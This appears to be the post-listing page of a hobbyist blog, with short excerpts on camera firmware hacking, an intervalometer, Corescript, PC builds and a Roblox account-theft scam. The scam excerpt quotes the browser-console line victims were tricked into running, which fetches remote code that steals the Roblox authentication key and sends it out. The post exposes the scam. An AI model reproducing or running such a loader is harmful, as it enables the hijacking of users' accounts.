Fooling Around With Fujifilm Firmware

Jul 30 2021 There's no need to write some kind of introduction to cameras here, so I'll get straight to the point. I recently got my hands on a cheap Fujifilm HS20 EXR. It's a pretty old camera (2012), but I thought it'd be a good way to practice my firmware hacking skills.

The Magic Button Preser

Jul 5 2021 In Summer 2020, I started getting into DSLR astrophotography image processing. In a nutshell, I needed to take multiple pictures (50-100) at once. I quickly started using the burst feature, but it limited me to taking 10 pictures at once, so I had to stand by the camera and keep pressing the shutter button every. I quickly realized I needed an intervalometer, AKA "Magic Button Presser".

The Roblox Scam Rabbit Hole

September 21, 2020 James 3:16: For where jealousy and selfish ambition exist, there will be disorder and every vile practice. On January 28th, 2020, I decided to visit Roblox to check up on things a bit. I am almost never active there, and only log in every month or so. I noticed that I was sent a message by a Roblox friend, asking me a harmless question. hi dude i'm making a game and I wanna put your roblox character into it could you upload your roblox char texture as a decal and send the link to me here's a tutorial on how to do it if you don't already know: They linked me to a Youtube tutorial, and I was instantly suspicious of a scam. On the Youtube video, I was prompted to run this javascript in my browser: $.get('//rblx.link') "rblx.link" runs remote code from a third party website. That code gets your Roblox authentication key and sends it to their server, and then sends you to the profile texture as expected. When I clicked on my friends profile, they were wearing red and blue Roblox clothes, and the description was changed to: Ask your parents to vote for Trump this year! #MAGA2020 They had messed with the wrong person, and were going to pay.

What I Leaned from Working on a Programming Language for 3 Years

Thursday, December 26, 2019 Corescript is a small "programming language" project I started in the summer of 2017. It was more of a hobby project that I made for fun rather than something somebody would seriously use. I worked on it until early 2019, abandoned it, then I started working on the Heb12 android. The syntax for Corescript was meant to be very simple, and somewhat similar to MIT's Scratch.

Struggles Of Moving to GNU/Linux

12/12/12 Was 6 Years Ago!

Dec 12 2018 Remember 12/12/12? It's hard to believe it was six entire years ago. I remember looking at the date at school to see that the numbers repeated! We won't have a special date like that until January first, 2101.

So I had an old laptop - and turned into a desktop. But there's a catch: I built it in a cardboard box. Yes, it may sound like the most ridiculous thing you have ever heard, but it was fun to make.

My New PC

March 31 2018 I just got a new PC about 2 weeks ago, and I love it. It has 8 gigs of ram, and an i5 2400 processor clocking a 3.1ghz. It has a 500gb SATA drive at 7200 rpm. It does everything I need it to do, like running Chrome, Sublime Text, and Visual Studio. It runs Minecraft fine, which is one of my most favorite games. I just got BeamNG.Drive, only to figure out it runs really really slow... and I mean 4fps slow. I was only able to get it to run at maybe 15fps at the lowest settings, with the window screen at it's the smallest state. So it turns out, The computer has no dedicated graphics card other than the CPU's integrated Intel 2000 graphics, which most games, unlike Minecraft, heavily rely on. Other than than It's a perfect system. My new graphics card will be coming soon. I think I only play light games, like Minecraft, and the exception of BeamNG.Drive. Hopefully, I can run it fullscreen now, with the settings at medium.

I made an Operating System.

March 29 2018 Yes. I made an operating system. You might have though I have made a Scratch OS - but I didn't. Scratch "OSes" aren't real, as they can't boot on real hardware. So yes, I made a real, bootable operating system. I present to you... Prism OS! It's a work-in-progress though, but I shall release it soon. It works by first booting FreeDOS, and then firing up bwBasic, which is a free lightweight alternative to Qbasic. It then starts the prismos.bas file, all in under 3 seconds. I seems that many programmers have dreamed of making of a OS, but don't have the knowledge to do it. After hours of trying to write in assembly, most just give up. But after lots of fiddling I finally figured it out. I know a lot of you are wanting to copy me, so I might be releasing a YouTube video of how to do this.

No More Scratch Extensions

November 30, 2017 Pufflegamerz Well, this is a bummer. The Scratch Team just announced that they are going to delete all Scratch extension advertisements. This means the IsOnline account is gone, the @ScratchMoji account is gone, and all other scratch extensions are gone. (I had just started working on ScratchFormat at this point)

Every Possible Command In Corescript

October 10, 2017 I have made a corescript program where I have put every single command there is in Corescript. You can see it here: https://corescript.neocities.org/editor/#var name=John@break@set name=Jimmy@break@print Hello, (name)!@break@// Hello!@break@input name=What's your name?@break@cls@break@msg Hello!@break@goto 8@break@stop@break@if name=John@break@not name=John@break@play http://www.sample-videos.com/audio/mp3/crowd-cheering.mp3 ( Since Wix says it is not a valid url, you will just have to copy + paste it into your url bar ) Also, don't try running it, since Corescript does not like every single command used at once. :)

Corescript

October 9, 2017 For the past couple of months, I have been working on Corescript. I have just released 7.1, which you can access here. I started Corescript about 7 Months ago. The GUI has changed a lot. This new update mainly includes bug fixes. P.S. I lost the password to my X10Hosting website, so I will be moving everything to Github. Blog Started December 29, 2016.
